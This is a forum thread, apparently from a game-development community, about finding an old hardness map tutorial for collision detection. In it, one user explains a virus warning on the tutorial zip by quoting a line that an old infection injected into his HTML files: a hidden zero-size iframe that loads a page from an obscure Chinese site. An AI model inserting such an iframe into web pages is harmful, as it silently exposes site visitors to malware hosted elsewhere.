Does anyone have a copy of the old hardness map tutorial from div-arena (or anything similar). I'm making a game with hardness maps, which has been working fine, but now I've run into a little trouble I think it would be best for me to see how others have done it. I've checked archive.org, and they didn't archive that zip, so I thought one of you guys might have a copy. Cheers ____________ |

Alternatively, you could invoke the excentric but mostly harmless forumdwellers, which will indubitably make everything right once again.

Possible, and thanks for the offer, but in this scenario it would be easier for me to just have a gander at some source code/tutorial I might resort to that if things get really bad. ____________ |

Norton thinks that platform.htm in that zip is a "high risk" virus and removes it as soon as I download the zip. Probably a false alarm, but I just want cofirmation before I unzip.

There is no virus in there, but I know what it is probably. Years ago I had a virus that edited every single .html/.htm file on my harddisk and added an Iframe loading an obscure chinese site. I never bothered to remove it everywhere as Internet Explorer blocks the loading of it automatically. Sorry for not thinking of it though when uploading. (It was the following line - don't go there) Code: <iframe src="http://www.q520.cn/qq/index.htm" width="0" height="0" frameborder="0"></iframe> Re-uploaded it. ____________ Personal website: http://www.loijson.com |

I've got the old michael sexton rpg tutorials - both of them. PM me and I can email them to you. A word of advice: the trick is to check whether you will collide with the hardness map BEFORE making a move, and not after (as checking afterwards makes things much more complicated). I've also got the code to a worms-like game I made that used a hardness map, if you'd like it.
